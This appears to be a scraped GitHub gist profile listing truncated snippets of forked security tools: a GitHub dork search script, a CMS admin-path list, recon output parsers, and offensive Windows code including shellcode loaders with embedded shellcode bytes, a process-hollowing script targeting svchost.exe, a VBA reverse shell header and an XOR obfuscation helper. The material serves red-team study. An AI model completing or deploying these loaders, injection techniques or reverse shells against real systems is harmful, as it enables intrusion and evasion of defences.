Skip to content

Instantly share code, notes, and snippets.

View marcostolosa's full-sized avatar
👽
Memento Mori.

Marcos 'Tr0p' Tolosa marcostolosa

👽
Memento Mori.
View GitHub Profile
@marcostolosa
marcostolosa / search-n-squeal.sh
Created October 18, 2025 09:22 — forked from scumdestroy/search-n-squeal.sh
Search'N'Squeal : Bash script that searches a list of dorks on Github and notifies if new search result has appeared
#!/bin/sh
# func to do the search w/ curl
# syntax `perform_search anti-fur_APIKEY gh_APIKEYAPIKEYAPIKEY`
perform_search() {
local search_term="$1"
local api_key="$2"
curl -s -H "Authorization: token $api_key" "https://api.github.com/search/repositories?q=$search_term" | jq '.items[].html_url'
}
WordPress: /wp-admin
Drupal: /admin
Joomla: /administrator
Magento: /admin
Concrete5: /dashboard
SilverStripe: /admin
Textpattern: /textpattern
MODX: /manager
Radiant CMS: /admin
Contao: /contao
#!/usr/bin/env python3
'''
Greetings bug-slaying brothers of the pythonian blood. This script takes my httpx output after slamming in a bunch of subdomains
and organizes it so its a bit easier to read and work with.
The HTTPX payload I use first is:
httpx -sc -cl -title -bp -server -td -ip -cname -asn -cdn -vhost -fhr | anew httpx-quicc
This script will organize the data by status code and then from smallest to largest for each status code
#!/usr/bin/env python3
'''
Get the excellent GoLinkFinder tool via github.com/0xsha/GoLinkFinder
... based on my boy here: https://github.com/GerbenJavado/LinkFinder
Anyways, this gives an excellent clean and parsed output after running GoLinkFinder on a gang of urls.
use this like:
python3 golinkfinderx.py urls.txt
'''

Screen Quick Reference

Basic

Description Command
Start a new session with session name screen -S <session_name>
List running sessions / screens screen -ls
Attach to a running session screen -x
Attach to a running session with name screen -r
// Saumyajeet Das
// Written/Compiled: Visual Studio 2022
// Usage: midiOutOpen.exe <shellcode file>
#pragma comment(lib, "winmm.lib")
#include <stdio.h>
#include <Windows.h>
#include <mmsystem.h>
BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize);
@marcostolosa
marcostolosa / JasonToddIsTheBestRobin.c
Created October 8, 2025 01:36 — forked from whokilleddb/JasonToddIsTheBestRobin.c
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
@marcostolosa
marcostolosa / DynWin32-ShellcodeProcessHollowing.ps1
Created August 25, 2025 21:59 — forked from qtc-de/DynWin32-ShellcodeProcessHollowing.ps1
PowerShell implementation of shellcode based Process Hollowing that only relies on dynamically resolved Win32 API functions
<#
DynWin32-ShellcodeProcessHollowing.ps1 performs shellcode based process hollowing using
dynamically looked up Win32 API calls. The script obtains the methods GetModuleHandle,
GetProcAddress and CreateProcess by using reflection. Afterwards it utilizes GetModuleHandle
and GetProcAddress to obtain the addresses of the other required Win32 API calls.
When all required Win32 API calls are looked up, it starts svchost.exe in a suspended state
and overwrites the entrypoint with the specified shellcode. Afterwards, the thread is resumed
and the shellcode is executed enveloped within the trusted svchost.exe process.
@marcostolosa
marcostolosa / Win32-ReverseShell.vb
Created August 25, 2025 21:59 — forked from qtc-de/Win32-ReverseShell.vb
VBA reverse shell that uses Win32 API calls
' ********************************************************************************************************
'
' VBA reverse shell that uses Win32 API calls. Most of the code was copied from the following resources:
'
' * https://stackoverflow.com/questions/8670391
' * https://stackoverflow.com/questions/43197814
' * https://renenyffenegger.ch/notes/development/languages/VBA/Win-API/examples/
'
' The code demonstrates more complex usage example for calling Win32 API from VBA and should be used
' for educational purpose only. During development I was mainly interested whether the WSAData or the
@marcostolosa
marcostolosa / xor.py
Created August 25, 2025 21:59 — forked from qtc-de/xor.py
XOR All The Things! Python script that searches for byte representations within the specified file or input and xors them with the specified key.
#!/usr/bin/env python3
import re
import sys
import argparse
class Xor:
'''
Helper class for performing xor operations.